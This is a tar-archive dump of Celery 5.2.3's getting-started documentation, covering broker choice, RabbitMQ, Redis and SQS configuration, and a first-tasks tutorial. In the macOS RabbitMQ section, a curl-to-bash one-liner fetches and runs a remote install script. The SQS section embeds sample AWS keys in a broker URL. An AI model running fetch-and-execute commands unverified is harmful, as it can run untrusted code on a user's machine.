supported due to lack of resources. But it may still work and we are happy to accept patches. ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5517523 celery-5.2.3/docs/getting-started/0000775000175000017500000000000000000000000016732 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5557525 celery-5.2.3/docs/getting-started/backends-and-brokers/0000775000175000017500000000000000000000000022711 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/backends-and-brokers/index.rst0000664000175000017500000000755400000000000024565 0ustar00asifasif00000000000000.. _brokers: ====================== Backends and Brokers ====================== :Release: |version| :Date: |today| Celery supports several message transport alternatives. .. _broker_toc: Broker Instructions =================== .. toctree:: :maxdepth: 1 rabbitmq redis sqs .. _broker-overview: Broker Overview =============== This is comparison table of the different transports supports, more information can be found in the documentation for each individual transport (see :ref:`broker_toc`). +---------------+--------------+----------------+--------------------+ | **Name** | **Status** | **Monitoring** | **Remote Control** | +---------------+--------------+----------------+--------------------+ | *RabbitMQ* | Stable | Yes | Yes | +---------------+--------------+----------------+--------------------+ | *Redis* | Stable | Yes | Yes | +---------------+--------------+----------------+--------------------+ | *Amazon SQS* | Stable | No | No | +---------------+--------------+----------------+--------------------+ | *Zookeeper* | Experimental | No | No | +---------------+--------------+----------------+--------------------+ Experimental brokers may be functional but they don't have dedicated maintainers. Missing monitor support means that the transport doesn't implement events, and as such Flower, `celery events`, `celerymon` and other event-based monitoring tools won't work. Remote control means the ability to inspect and manage workers at runtime using the `celery inspect` and `celery control` commands (and other tools using the remote control API). Summaries ========= *Note: This section is not comprehensive of backends and brokers.* Celery has the ability to communicate and store with many different backends (Result Stores) and brokers (Message Transports). Redis ----- Redis can be both a backend and a broker. **As a Broker:** Redis works well for rapid transport of small messages. Large messages can congest the system. :ref:`See documentation for details ` **As a Backend:** Redis is a super fast K/V store, making it very efficient for fetching the results of a task call. As with the design of Redis, you do have to consider the limit memory available to store your data, and how you handle data persistence. If result persistence is important, consider using another DB for your backend. RabbitMQ -------- RabbitMQ is a broker. **As a Broker:** RabbitMQ handles larger messages better than Redis, however if many messages are coming in very quickly, scaling can become a concern and Redis or SQS should be considered unless RabbitMQ is running at very large scale. :ref:`See documentation for details ` **As a Backend:** RabbitMQ can store results via ``rpc://`` backend. This backend creates separate temporary queue for each client. *Note: RabbitMQ (as the broker) and Redis (as the backend) are very commonly used together. If more guaranteed long-term persistence is needed from the result store, consider using PostgreSQL or MySQL (through SQLAlchemy), Cassandra, or a custom defined backend.* SQS --- SQS is a broker. If you already integrate tightly with AWS, and are familiar with SQS, it presents a great option as a broker. It is extremely scalable and completely managed, and manages task delegation similarly to RabbitMQ. It does lack some of the features of the RabbitMQ broker such as ``worker remote control commands``. :ref:`See documentation for details ` SQLAlchemy ---------- SQLAlchemy is backend. It allows Celery to interface with MySQL, PostgreSQL, SQlite, and more. It is a ORM, and is the way Celery can use a SQL DB as a result backend. Historically, SQLAlchemy has not been the most stable result backend so if chosen one should proceed with caution. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/backends-and-brokers/rabbitmq.rst0000664000175000017500000001161200000000000025245 0ustar00asifasif00000000000000.. _broker-rabbitmq: ================ Using RabbitMQ ================ .. contents:: :local: Installation & Configuration ============================ RabbitMQ is the default broker so it doesn't require any additional dependencies or initial configuration, other than the URL location of the broker instance you want to use: .. code-block:: python broker_url = 'amqp://myuser:mypassword@localhost:5672/myvhost' For a description of broker URLs and a full list of the various broker configuration options available to Celery, see :ref:`conf-broker-settings`, and see below for setting up the username, password and vhost. .. _installing-rabbitmq: Installing the RabbitMQ Server ============================== See `Installing RabbitMQ`_ over at RabbitMQ's website. For macOS see `Installing RabbitMQ on macOS`_. .. _`Installing RabbitMQ`: http://www.rabbitmq.com/install.html .. note:: If you're getting `nodedown` errors after installing and using :command:`rabbitmqctl` then this blog post can help you identify the source of the problem: http://www.somic.org/2009/02/19/on-rabbitmqctl-and-badrpcnodedown/ .. _rabbitmq-configuration: Setting up RabbitMQ ------------------- To use Celery we need to create a RabbitMQ user, a virtual host and allow that user access to that virtual host: .. code-block:: console $ sudo rabbitmqctl add_user myuser mypassword .. code-block:: console $ sudo rabbitmqctl add_vhost myvhost .. code-block:: console $ sudo rabbitmqctl set_user_tags myuser mytag .. code-block:: console $ sudo rabbitmqctl set_permissions -p myvhost myuser ".*" ".*" ".*" Substitute in appropriate values for ``myuser``, ``mypassword`` and ``myvhost`` above. See the RabbitMQ `Admin Guide`_ for more information about `access control`_. .. _`Admin Guide`: http://www.rabbitmq.com/admin-guide.html .. _`access control`: http://www.rabbitmq.com/admin-guide.html#access-control .. _rabbitmq-macOS-installation: Installing RabbitMQ on macOS ---------------------------- The easiest way to install RabbitMQ on macOS is using `Homebrew`_ the new and shiny package management system for macOS. First, install Homebrew using the one-line command provided by the `Homebrew documentation`_: .. code-block:: console /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" Finally, we can install RabbitMQ using :command:`brew`: .. code-block:: console $ brew install rabbitmq .. _`Homebrew`: https://github.com/mxcl/homebrew/ .. _`Homebrew documentation`: https://github.com/Homebrew/homebrew/wiki/Installation .. _rabbitmq-macOS-system-hostname: After you've installed RabbitMQ with :command:`brew` you need to add the following to your path to be able to start and stop the broker: add it to the start-up file for your shell (e.g., :file:`.bash_profile` or :file:`.profile`). .. code-block:: bash PATH=$PATH:/usr/local/sbin Configuring the system host name ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If you're using a DHCP server that's giving you a random host name, you need to permanently configure the host name. This is because RabbitMQ uses the host name to communicate with nodes. Use the :command:`scutil` command to permanently set your host name: .. code-block:: console $ sudo scutil --set HostName myhost.local Then add that host name to :file:`/etc/hosts` so it's possible to resolve it back into an IP address:: 127.0.0.1 localhost myhost myhost.local If you start the :command:`rabbitmq-server`, your rabbit node should now be `rabbit@myhost`, as verified by :command:`rabbitmqctl`: .. code-block:: console $ sudo rabbitmqctl status Status of node rabbit@myhost ... [{running_applications,[{rabbit,"RabbitMQ","1.7.1"}, {mnesia,"MNESIA CXC 138 12","4.4.12"}, {os_mon,"CPO CXC 138 46","2.2.4"}, {sasl,"SASL CXC 138 11","2.1.8"}, {stdlib,"ERTS CXC 138 10","1.16.4"}, {kernel,"ERTS CXC 138 10","2.13.4"}]}, {nodes,[rabbit@myhost]}, {running_nodes,[rabbit@myhost]}] ...done. This is especially important if your DHCP server gives you a host name starting with an IP address, (e.g., `23.10.112.31.comcast.net`). In this case RabbitMQ will try to use `rabbit@23`: an illegal host name. .. _rabbitmq-macOS-start-stop: Starting/Stopping the RabbitMQ server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To start the server: .. code-block:: console $ sudo rabbitmq-server you can also run it in the background by adding the ``-detached`` option (note: only one dash): .. code-block:: console $ sudo rabbitmq-server -detached Never use :command:`kill` (:manpage:`kill(1)`) to stop the RabbitMQ server, but rather use the :command:`rabbitmqctl` command: .. code-block:: console $ sudo rabbitmqctl stop When the server is running, you can continue reading `Setting up RabbitMQ`_. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/backends-and-brokers/redis.rst0000664000175000017500000001447600000000000024565 0ustar00asifasif00000000000000.. _broker-redis: ============= Using Redis ============= .. _broker-redis-installation: Installation ============ For the Redis support you have to install additional dependencies. You can install both Celery and these dependencies in one go using the ``celery[redis]`` :ref:`bundle `: .. code-block:: console $ pip install -U "celery[redis]" .. _broker-redis-configuration: Configuration ============= Configuration is easy, just configure the location of your Redis database: .. code-block:: python app.conf.broker_url = 'redis://localhost:6379/0' Where the URL is in the format of: .. code-block:: text redis://:password@hostname:port/db_number all fields after the scheme are optional, and will default to ``localhost`` on port 6379, using database 0. If a Unix socket connection should be used, the URL needs to be in the format: .. code-block:: text redis+socket:///path/to/redis.sock Specifying a different database number when using a Unix socket is possible by adding the ``virtual_host`` parameter to the URL: .. code-block:: text redis+socket:///path/to/redis.sock?virtual_host=db_number It is also easy to connect directly to a list of Redis Sentinel: .. code-block:: python app.conf.broker_url = 'sentinel://localhost:26379;sentinel://localhost:26380;sentinel://localhost:26381' app.conf.broker_transport_options = { 'master_name': "cluster1" } Additional options can be passed to the Sentinel client using ``sentinel_kwargs``: .. code-block:: python app.conf.broker_transport_options = { 'sentinel_kwargs': { 'password': "password" } } .. _redis-visibility_timeout: Visibility Timeout ------------------ The visibility timeout defines the number of seconds to wait for the worker to acknowledge the task before the message is redelivered to another worker. Be sure to see :ref:`redis-caveats` below. This option is set via the :setting:`broker_transport_options` setting: .. code-block:: python app.conf.broker_transport_options = {'visibility_timeout': 3600} # 1 hour. The default visibility timeout for Redis is 1 hour. .. _redis-results-configuration: Results ------- If you also want to store the state and return values of tasks in Redis, you should configure these settings:: app.conf.result_backend = 'redis://localhost:6379/0' For a complete list of options supported by the Redis result backend, see :ref:`conf-redis-result-backend`. If you are using Sentinel, you should specify the master_name using the :setting:`result_backend_transport_options` setting: .. code-block:: python app.conf.result_backend_transport_options = {'master_name': "mymaster"} .. _redis-result-backend-timeout: Connection timeouts ^^^^^^^^^^^^^^^^^^^ To configure the connection timeouts for the Redis result backend, use the ``retry_policy`` key under :setting:`result_backend_transport_options`: .. code-block:: python app.conf.result_backend_transport_options = { 'retry_policy': { 'timeout': 5.0 } } See :func:`~kombu.utils.functional.retry_over_time` for the possible retry policy options. .. _redis-caveats: Caveats ======= Visibility timeout ------------------ If a task isn't acknowledged within the :ref:`redis-visibility_timeout` the task will be redelivered to another worker and executed. This causes problems with ETA/countdown/retry tasks where the time to execute exceeds the visibility timeout; in fact if that happens it will be executed again, and again in a loop. So you have to increase the visibility timeout to match the time of the longest ETA you're planning to use. Note that Celery will redeliver messages at worker shutdown, so having a long visibility timeout will only delay the redelivery of 'lost' tasks in the event of a power failure or forcefully terminated workers. Periodic tasks won't be affected by the visibility timeout, as this is a concept separate from ETA/countdown. You can increase this timeout by configuring a transport option with the same name: .. code-block:: python app.conf.broker_transport_options = {'visibility_timeout': 43200} The value must be an int describing the number of seconds. Key eviction ------------ Redis may evict keys from the database in some situations If you experience an error like: .. code-block:: text InconsistencyError: Probably the key ('_kombu.binding.celery') has been removed from the Redis database. then you may want to configure the :command:`redis-server` to not evict keys by setting in the redis configuration file: - the ``maxmemory`` option - the ``maxmemory-policy`` option to ``noeviction`` or ``allkeys-lru`` See Redis server documentation about Eviction Policies for details: https://redis.io/topics/lru-cache .. _redis-group-result-ordering: Group result ordering --------------------- Versions of Celery up to and including 4.4.6 used an unsorted list to store result objects for groups in the Redis backend. This can cause those results to be be returned in a different order to their associated tasks in the original group instantiation. Celery 4.4.7 introduced an opt-in behaviour which fixes this issue and ensures that group results are returned in the same order the tasks were defined, matching the behaviour of other backends. In Celery 5.0 this behaviour was changed to be opt-out. The behaviour is controlled by the `result_chord_ordered` configuration option which may be set like so: .. code-block:: python # Specifying this for workers running Celery 4.4.6 or earlier has no effect app.conf.result_backend_transport_options = { 'result_chord_ordered': True # or False } This is an incompatible change in the runtime behaviour of workers sharing the same Redis backend for result storage, so all workers must follow either the new or old behaviour to avoid breakage. For clusters with some workers running Celery 4.4.6 or earlier, this means that workers running 4.4.7 need no special configuration and workers running 5.0 or later must have `result_chord_ordered` set to `False`. For clusters with no workers running 4.4.6 or earlier but some workers running 4.4.7, it is recommended that `result_chord_ordered` be set to `True` for all workers to ease future migration. Migration between behaviours will disrupt results currently held in the Redis backend and cause breakage if downstream tasks are run by migrated workers - plan accordingly. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/getting-started/backends-and-brokers/sqs.rst0000664000175000017500000002440500000000000024256 0ustar00asifasif00000000000000.. _broker-sqs: ================== Using Amazon SQS ================== .. _broker-sqs-installation: Installation ============ For the Amazon SQS support you have to install additional dependencies. You can install both Celery and these dependencies in one go using the ``celery[sqs]`` :ref:`bundle `: .. code-block:: console $ pip install celery[sqs] .. _broker-sqs-configuration: Configuration ============= You have to specify SQS in the broker URL:: broker_url = 'sqs://ABCDEFGHIJKLMNOPQRST:ZYXK7NiynGlTogH8Nj+P9nlE73sq3@' where the URL format is: .. code-block:: text sqs://aws_access_key_id:aws_secret_access_key@ Please note that you must remember to include the ``@`` sign at the end and encode the password so it can always be parsed correctly. For example: .. code-block:: python from kombu.utils.url import safequote aws_access_key = safequote("ABCDEFGHIJKLMNOPQRST") aws_secret_key = safequote("ZYXK7NiynG/TogH8Nj+P9nlE73sq3") broker_url = "sqs://{aws_access_key}:{aws_secret_key}@".format( aws_access_key=aws_access_key, aws_secret_key=aws_secret_key, ) .. warning:: Don't use this setup option with django's ``debug=True``. It may lead to security issues within deployed django apps. In debug mode django shows environment variables and the SQS URL may be exposed to the internet including your AWS access and secret keys. Please turn off debug mode on your deployed django application or consider a setup option described below. The login credentials can also be set using the environment variables :envvar:`AWS_ACCESS_KEY_ID` and :envvar:`AWS_SECRET_ACCESS_KEY`, in that case the broker URL may only be ``sqs://``. If you are using IAM roles on instances, you can set the BROKER_URL to: ``sqs://`` and kombu will attempt to retrieve access tokens from the instance metadata. Options ======= Region ------ The default region is ``us-east-1`` but you can select another region by configuring the :setting:`broker_transport_options` setting:: broker_transport_options = {'region': 'eu-west-1'} .. seealso:: An overview of Amazon Web Services regions can be found here: http://aws.amazon.com/about-aws/globalinfrastructure/ Visibility Timeout ------------------ The visibility timeout defines the number of seconds to wait for the worker to acknowledge the task before the message is redelivered to another worker. Also see caveats below. This option is set via the :setting:`broker_transport_options` setting:: broker_transport_options = {'visibility_timeout': 3600} # 1 hour. The default visibility timeout is 30 minutes. Polling Interval ---------------- The polling interval decides the number of seconds to sleep between unsuccessful polls. This value can be either an int or a float. By default the value is *one second*: this means the worker will sleep for one second when there's no more messages to read. You must note that **more frequent polling is also more expensive, so increasing the polling interval can save you money**. The polling interval can be set via the :setting:`broker_transport_options` setting:: broker_transport_options = {'polling_interval': 0.3} Very frequent polling intervals can cause *busy loops*, resulting in the worker using a lot of CPU time. If you need sub-millisecond precision you should consider using another transport, like `RabbitMQ `, or `Redis `. Long Polling ------------ `SQS Long Polling`_ is enabled by default and the ``WaitTimeSeconds`` parameter of `ReceiveMessage`_ operation is set to 10 seconds. The value of ``WaitTimeSeconds`` parameter can be set via the :setting:`broker_transport_options` setting:: broker_transport_options = {'wait_time_seconds': 15} Valid values are 0 to 20. Note that newly created queues themselves (also if created by Celery) will have the default value of 0 set for the "Receive Message Wait Time" queue property. .. _`SQS Long Polling`: https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-long-polling.html .. _`ReceiveMessage`: https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_ReceiveMessage.html Queue Prefix ------------ By default Celery won't assign any prefix to the queue names, If you have other services using SQS you can configure it do so using the :setting:`broker_transport_options` setting:: broker_transport_options = {'queue_name_prefix': 'celery-'} Predefined Queues ----------------- If you want Celery to use a set of predefined queues in AWS, and to never attempt to list SQS queues, nor attempt to create or delete them, pass a map of queue names to URLs using the :setting:`predefined_queues` setting:: broker_transport_options = { 'predefined_queues': { 'my-q': { 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q', 'access_key_id': 'xxx', 'secret_access_key': 'xxx', } } } Back-off policy ------------------------ Back-off policy is using SQS visibility timeout mechanism altering the time difference between task retries. The mechanism changes message specific ``visibility timeout`` from queue ``Default visibility timeout`` to policy configured timeout. The number of retries is managed by SQS (specifically by the ``ApproximateReceiveCount`` message attribute) and no further action is required by the user. Configuring the queues and backoff policy:: broker_transport_options = { 'predefined_queues': { 'my-q': { 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q', 'access_key_id': 'xxx', 'secret_access_key': 'xxx', 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640}, 'backoff_tasks': ['svc.tasks.tasks.task1'] } } } ``backoff_policy`` dictionary where key is number of retries, and value is delay seconds between retries (i.e SQS visibility timeout) ``backoff_tasks`` list of task names to apply the above policy The above policy: +-----------------------------------------+--------------------------------------------+ | **Attempt** | **Delay** | +-----------------------------------------+--------------------------------------------+ | ``2nd attempt`` | 20 seconds | +-----------------------------------------+--------------------------------------------+ | ``3rd attempt`` | 40 seconds | +-----------------------------------------+--------------------------------------------+ | ``4th attempt`` | 80 seconds | +-----------------------------------------+--------------------------------------------+ | ``5th attempt`` | 320 seconds | +-----------------------------------------+--------------------------------------------+ | ``6th attempt`` | 640 seconds | +-----------------------------------------+--------------------------------------------+ STS token authentication ---------------------------- https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html AWS STS authentication is supported by using the ``sts_role_arn`` and ``sts_token_timeout`` broker transport options. ``sts_role_arn`` is the assumed IAM role ARN we use to authorize our access to SQS. ``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created:: broker_transport_options = { 'predefined_queues': { 'my-q': { 'url': 'https://ap-southeast-2.queue.amazonaws.com/123456/my-q', 'access_key_id': 'xxx', 'secret_access_key': 'xxx', 'backoff_policy': {1: 10, 2: 20, 3: 40, 4: 80, 5: 320, 6: 640}, 'backoff_tasks': ['svc.tasks.tasks.task1'] } }, 'sts_role_arn': 'arn:aws:iam:::role/STSTest', # optional 'sts_token_timeout': 900 # optional } .. _sqs-caveats: Caveats ======= - If a task isn't acknowledged within the ``visibility_timeout``, the task will be redelivered to another worker and executed. This causes problems with ETA/countdown/retry tasks where the time to execute exceeds the visibility timeout; in fact if that happens it will be executed again, and again in a loop. So you have to increase the visibility timeout to match the time of the longest ETA you're planning to use. Note that Celery will redeliver messages at worker shutdown, so having a long visibility timeout will only delay the redelivery of 'lost' tasks in the event of a power failure or forcefully terminated workers. Periodic tasks won't be affected by the visibility timeout, as it is a concept separate from ETA/countdown. The maximum visibility timeout supported by AWS as of this writing is 12 hours (43200 seconds):: broker_transport_options = {'visibility_timeout': 43200} - SQS doesn't yet support worker remote control commands. - SQS doesn't yet support events, and so cannot be used with :program:`celery events`, :program:`celerymon`, or the Django Admin monitor. - With FIFO queues it might be necessary to set additional message properties such as ``MessageGroupId`` and ``MessageDeduplicationId`` when publishing a message. Message properties can be passed as keyword arguments to :meth:`~celery.app.task.Task.apply_async`: .. code-block:: python message_properties = { 'MessageGroupId': '', 'MessageDeduplicationId': '' } task.apply_async(**message_properties) .. _sqs-results-configuration: Results ------- Multiple products in the Amazon Web Services family could be a good candidate to store or publish results with, but there's no such result backend included at this point. .. warning:: Don't use the ``amqp`` result backend with SQS. It will create one queue for every task, and the queues will not be collected. This could cost you money that would be better spent contributing an AWS result store backend back to Celery :) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/first-steps-with-celery.rst0000664000175000017500000003524700000000000024214 0ustar00asifasif00000000000000.. _tut-celery: .. _first-steps: ========================= First Steps with Celery ========================= Celery is a task queue with batteries included. It's easy to use so that you can get started without learning the full complexities of the problem it solves. It's designed around best practices so that your product can scale and integrate with other languages, and it comes with the tools and support you need to run such a system in production. In this tutorial you'll learn the absolute basics of using Celery. Learn about; - Choosing and installing a message transport (broker). - Installing Celery and creating your first task. - Starting the worker and calling tasks. - Keeping track of tasks as they transition through different states, and inspecting return values. Celery may seem daunting at first - but don't worry - this tutorial will get you started in no time. It's deliberately kept simple, so as to not confuse you with advanced features. After you have finished this tutorial, it's a good idea to browse the rest of the documentation. For example the :ref:`next-steps` tutorial will showcase Celery's capabilities. .. contents:: :local: .. _celerytut-broker: Choosing a Broker ================= Celery requires a solution to send and receive messages; usually this comes in the form of a separate service called a *message broker*. There are several choices available, including: RabbitMQ -------- `RabbitMQ`_ is feature-complete, stable, durable and easy to install. It's an excellent choice for a production environment. Detailed information about using RabbitMQ with Celery: :ref:`broker-rabbitmq` .. _`RabbitMQ`: http://www.rabbitmq.com/ If you're using Ubuntu or Debian install RabbitMQ by executing this command: .. code-block:: console $ sudo apt-get install rabbitmq-server Or, if you want to run it on Docker execute this: .. code-block:: console $ docker run -d -p 5672:5672 rabbitmq When the command completes, the broker will already be running in the background, ready to move messages for you: ``Starting rabbitmq-server: SUCCESS``. Don't worry if you're not running Ubuntu or Debian, you can go to this website to find similarly simple installation instructions for other platforms, including Microsoft Windows: http://www.rabbitmq.com/download.html Redis ----- `Redis`_ is also feature-complete, but is more susceptible to data loss in the event of abrupt termination or power failures. Detailed information about using Redis: :ref:`broker-redis` .. _`Redis`: https://redis.io/ If you want to run it on Docker execute this: .. code-block:: console $ docker run -d -p 6379:6379 redis Other brokers ------------- In addition to the above, there are other experimental transport implementations to choose from, including :ref:`Amazon SQS `. See :ref:`broker-overview` for a full list. .. _celerytut-installation: Installing Celery ================= Celery is on the Python Package Index (PyPI), so it can be installed with standard Python tools like ``pip`` or ``easy_install``: .. code-block:: console $ pip install celery Application =========== The first thing you need is a Celery instance. We call this the *Celery application* or just *app* for short. As this instance is used as the entry-point for everything you want to do in Celery, like creating tasks and managing workers, it must be possible for other modules to import it. In this tutorial we keep everything contained in a single module, but for larger projects you want to create a :ref:`dedicated module `. Let's create the file :file:`tasks.py`: .. code-block:: python from celery import Celery app = Celery('tasks', broker='pyamqp://guest@localhost//') @app.task def add(x, y): return x + y The first argument to :class:`~celery.app.Celery` is the name of the current module. This is only needed so that names can be automatically generated when the tasks are defined in the `__main__` module. The second argument is the broker keyword argument, specifying the URL of the message broker you want to use. Here we are using RabbitMQ (also the default option). See :ref:`celerytut-broker` above for more choices -- for RabbitMQ you can use ``amqp://localhost``, or for Redis you can use ``redis://localhost``. You defined a single task, called ``add``, returning the sum of two numbers. .. _celerytut-running-the-worker: Running the Celery worker server ================================ You can now run the worker by executing our program with the ``worker`` argument: .. code-block:: console $ celery -A tasks worker --loglevel=INFO .. note:: See the :ref:`celerytut-troubleshooting` section if the worker doesn't start. In production you'll want to run the worker in the background as a daemon. To do this you need to use the tools provided by your platform, or something like `supervisord`_ (see :ref:`daemonizing` for more information). For a complete listing of the command-line options available, do: .. code-block:: console $ celery worker --help There are also several other commands available, and help is also available: .. code-block:: console $ celery --help .. _`supervisord`: http://supervisord.org .. _celerytut-calling: Calling the task ================ To call our task you can use the :meth:`~@Task.delay` method. This is a handy shortcut to the :meth:`~@Task.apply_async` method that gives greater control of the task execution (see :ref:`guide-calling`):: >>> from tasks import add >>> add.delay(4, 4) The task has now been processed by the worker you started earlier. You can verify this by looking at the worker's console output. Calling a task returns an :class:`~@AsyncResult` instance. This can be used to check the state of the task, wait for the task to finish, or get its return value (or if the task failed, to get the exception and traceback). Results are not enabled by default. In order to do remote procedure calls or keep track of task results in a database, you will need to configure Celery to use a result backend. This is described in the next section. .. _celerytut-keeping-results: Keeping Results =============== If you want to keep track of the tasks' states, Celery needs to store or send the states somewhere. There are several built-in result backends to choose from: `SQLAlchemy`_/`Django`_ ORM, `MongoDB`_, `Memcached`_, `Redis`_, :ref:`RPC ` (`RabbitMQ`_/AMQP), and -- or you can define your own. .. _`Memcached`: http://memcached.org .. _`MongoDB`: http://www.mongodb.org .. _`SQLAlchemy`: http://www.sqlalchemy.org/ .. _`Django`: http://djangoproject.com For this example we use the `rpc` result backend, that sends states back as transient messages. The backend is specified via the ``backend`` argument to :class:`@Celery`, (or via the :setting:`result_backend` setting if you choose to use a configuration module). So, you can modify this line in the `tasks.py` file to enable the `rpc://` backend: .. code-block:: python app = Celery('tasks', backend='rpc://', broker='pyamqp://') Or if you want to use Redis as the result backend, but still use RabbitMQ as the message broker (a popular combination): .. code-block:: python app = Celery('tasks', backend='redis://localhost', broker='pyamqp://') To read more about result backends please see :ref:`task-result-backends`. Now with the result backend configured, close the current python session and import the ``tasks`` module again to put the changes into effect. This time you'll hold on to the :class:`~@AsyncResult` instance returned when you call a task: .. code-block:: pycon >>> from tasks import add # close and reopen to get updated 'app' >>> result = add.delay(4, 4) The :meth:`~@AsyncResult.ready` method returns whether the task has finished processing or not: .. code-block:: pycon >>> result.ready() False You can wait for the result to complete, but this is rarely used since it turns the asynchronous call into a synchronous one: .. code-block:: pycon >>> result.get(timeout=1) 8 In case the task raised an exception, :meth:`~@AsyncResult.get` will re-raise the exception, but you can override this by specifying the ``propagate`` argument: .. code-block:: pycon >>> result.get(propagate=False) If the task raised an exception, you can also gain access to the original traceback: .. code-block:: pycon >>> result.traceback .. warning:: Backends use resources to store and transmit results. To ensure that resources are released, you must eventually call :meth:`~@AsyncResult.get` or :meth:`~@AsyncResult.forget` on EVERY :class:`~@AsyncResult` instance returned after calling a task. See :mod:`celery.result` for the complete result object reference. .. _celerytut-configuration: Configuration ============= Celery, like a consumer appliance, doesn't need much configuration to operate. It has an input and an output. The input must be connected to a broker, and the output can be optionally connected to a result backend. However, if you look closely at the back, there's a lid revealing loads of sliders, dials, and buttons: this is the configuration. The default configuration should be good enough for most use cases, but there are many options that can be configured to make Celery work exactly as needed. Reading about the options available is a good idea to familiarize yourself with what can be configured. You can read about the options in the :ref:`configuration` reference. The configuration can be set on the app directly or by using a dedicated configuration module. As an example you can configure the default serializer used for serializing task payloads by changing the :setting:`task_serializer` setting: .. code-block:: python app.conf.task_serializer = 'json' If you're configuring many settings at once you can use ``update``: .. code-block:: python app.conf.update( task_serializer='json', accept_content=['json'], # Ignore other content result_serializer='json', timezone='Europe/Oslo', enable_utc=True, ) For larger projects, a dedicated configuration module is recommended. Hard coding periodic task intervals and task routing options is discouraged. It is much better to keep these in a centralized location. This is especially true for libraries, as it enables users to control how their tasks behave. A centralized configuration will also allow your SysAdmin to make simple changes in the event of system trouble. You can tell your Celery instance to use a configuration module by calling the :meth:`@config_from_object` method: .. code-block:: python app.config_from_object('celeryconfig') This module is often called "``celeryconfig``", but you can use any module name. In the above case, a module named ``celeryconfig.py`` must be available to load from the current directory or on the Python path. It could look something like this: :file:`celeryconfig.py`: .. code-block:: python broker_url = 'pyamqp://' result_backend = 'rpc://' task_serializer = 'json' result_serializer = 'json' accept_content = ['json'] timezone = 'Europe/Oslo' enable_utc = True To verify that your configuration file works properly and doesn't contain any syntax errors, you can try to import it: .. code-block:: console $ python -m celeryconfig For a complete reference of configuration options, see :ref:`configuration`. To demonstrate the power of configuration files, this is how you'd route a misbehaving task to a dedicated queue: :file:`celeryconfig.py`: .. code-block:: python task_routes = { 'tasks.add': 'low-priority', } Or instead of routing it you could rate limit the task instead, so that only 10 tasks of this type can be processed in a minute (10/m): :file:`celeryconfig.py`: .. code-block:: python task_annotations = { 'tasks.add': {'rate_limit': '10/m'} } If you're using RabbitMQ or Redis as the broker then you can also direct the workers to set a new rate limit for the task at runtime: .. code-block:: console $ celery -A tasks control rate_limit tasks.add 10/m worker@example.com: OK new rate limit set successfully See :ref:`guide-routing` to read more about task routing, and the :setting:`task_annotations` setting for more about annotations, or :ref:`guide-monitoring` for more about remote control commands and how to monitor what your workers are doing. Where to go from here ===================== If you want to learn more you should continue to the :ref:`Next Steps ` tutorial, and after that you can read the :ref:`User Guide `. .. _celerytut-troubleshooting: Troubleshooting =============== There's also a troubleshooting section in the :ref:`faq`. Worker doesn't start: Permission Error -------------------------------------- - If you're using Debian, Ubuntu or other Debian-based distributions: Debian recently renamed the :file:`/dev/shm` special file to :file:`/run/shm`. A simple workaround is to create a symbolic link: .. code-block:: console # ln -s /run/shm /dev/shm - Others: If you provide any of the :option:`--pidfile `, :option:`--logfile ` or :option:`--statedb ` arguments, then you must make sure that they point to a file or directory that's writable and readable by the user starting the worker. Result backend doesn't work or tasks are always in ``PENDING`` state -------------------------------------------------------------------- All tasks are :state:`PENDING` by default, so the state would've been better named "unknown". Celery doesn't update the state when a task is sent, and any task with no history is assumed to be pending (you know the task id, after all). 1) Make sure that the task doesn't have ``ignore_result`` enabled. Enabling this option will force the worker to skip updating states. 2) Make sure the :setting:`task_ignore_result` setting isn't enabled. 3) Make sure that you don't have any old workers still running. It's easy to start multiple workers by accident, so make sure that the previous worker is properly shut down before you start a new one. An old worker that isn't configured with the expected result backend may be running and is hijacking the tasks. The :option:`--pidfile ` argument can be set to an absolute path to make sure this doesn't happen. 4) Make sure the client is configured with the right backend. If, for some reason, the client is configured to use a different backend than the worker, you won't be able to receive the result. Make sure the backend is configured correctly: .. code-block:: pycon >>> result = task.delay() >>> print(result.backend) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/getting-started/index.rst0000664000175000017500000000034200000000000020572 0ustar00asifasif00000000000000================= Getting Started ================= :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 introduction backends-and-brokers/index first-steps-with-celery next-steps resources ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/getting-started/introduction.rst0000664000175000017500000002522700000000000022215 0ustar00asifasif00000000000000.. _intro: ======================== Introduction to Celery ======================== .. contents:: :local: :depth: 1 What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work called a task. Dedicated worker processes constantly monitor task queues for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task the client adds a message to the queue, the broker then delivers that message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ and node-celery-ts_ for Node.js, and a `PHP client`_. Language interoperability can also be achieved exposing an HTTP endpoint and having a task that requests it (webhooks). .. _`PHP client`: 